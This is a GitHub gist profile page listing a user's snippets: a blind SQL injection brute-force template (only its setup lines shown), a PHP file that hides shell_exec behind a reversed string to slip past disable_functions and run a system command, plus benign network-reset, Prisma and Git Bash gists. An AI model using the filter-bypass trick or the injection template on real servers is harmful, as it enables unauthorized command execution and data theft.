Skip to content

Instantly share code, notes, and snippets.

View ardhptr21's full-sized avatar
👾
not sure

Ardhi Putra ardhptr21

👾
not sure
View GitHub Profile
@ardhptr21
ardhptr21 / brute.py
Last active June 24, 2023 17:02
Just for template script for brute force blind sql injection
import requests
import string
import time
possible = "," + string.printable[:-2]
query = input("QUERY: ")
target = "http://example.com"
result = ""
data = {"username": "", "password": "dummy"}
@ardhptr21
ardhptr21 / flush.cmd
Created May 18, 2023 09:59
Flushing the network cache in windows using CMD
netsh winsock reset
netsh int ip reset all
netsh winhttp reset proxy
ipconfig /flushdns
@ardhptr21
ardhptr21 / bypass.php
Created May 8, 2023 16:03
bypass PHP disable functions
<?php
$n = "cexe_llehs";
$b = strrev($n);
print($b('uname -a'));
?>
@ardhptr21
ardhptr21 / prisma.ts
Created March 22, 2023 15:07
This script will ensure that only one instance of Prisma client exists
import { PrismaClient } from '@prisma/client';
declare global {
namespace NodeJS {
interface Global {}
}
}
interface CustomNodeJsGlobal extends NodeJS.Global {
prisma: PrismaClient;
@ardhptr21
ardhptr21 / README.md
Last active March 25, 2024 17:12
Customize Git Bash Terminal

Customize Git Bash Terminal 🐱‍💻

preview

Usefull Link: